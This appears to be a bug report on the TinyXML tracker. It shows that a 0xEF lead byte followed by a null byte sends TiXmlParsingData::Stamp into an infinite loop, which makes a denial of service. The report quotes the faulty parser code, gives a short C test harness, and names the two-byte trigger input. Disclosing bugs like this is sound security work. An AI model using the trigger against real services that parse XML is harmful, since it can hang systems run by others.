TIXML_UTF_LEAD_0 can cause TinyXML DoS
Brought to you by:
leethomason
This vulnerability is caused by the following code(tinyxmlparser.cpp#212L) which has no op to p
while ( p < now )
{
// Treat p as unsigned, so we have a happy compiler.
const unsigned char* pU = (const unsigned char*)p;
// Code contributed by Fletcher Dunn: (modified by lee)
switch (*pU) {
// ...
case TIXML_UTF_LEAD_0:
if ( encoding == TIXML_ENCODING_UTF8 )
{
if ( *(p+1) && *(p+2) )
{
// In these cases, don't advance the column. These are
// 0-width spaces.
if ( *(pU+1)==TIXML_UTF_LEAD_1 && *(pU+2)==TIXML_UTF_LEAD_2 )
p += 3;
else if ( *(pU+1)==0xbfU && *(pU+2)==0xbeU )
p += 3;
else if ( *(pU+1)==0xbfU && *(pU+2)==0xbfU )
p += 3;
else
{ p +=3; ++col; } // A normal character.
}
}
else
{
++p;
++col;
}
break;
// ...
}
}
My test program:
#include "tinyxml.h"
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char*argv[]){
if(argc < 2){
printf("args error\n");
return 0;
}
int fd = open(argv[1], O_RDWR | O_APPEND);
if(!fd){
printf("open failed\n");
return -1;
}
int bytes = 1024 * 1024;
char *buffer = (char*)malloc(bytes);
int n = read(fd, buffer, bytes-1);
printf("read %d bytes\n", n);
TiXmlDocument doc;
doc.Parse(buffer);
close(fd);
free(buffer);
return 0;
}
./harness ./test_case
And my test case is in the attachment
\xef\0
can cause TiXmlParsingData::Stamp loop forever, so that I think this can be described as DoS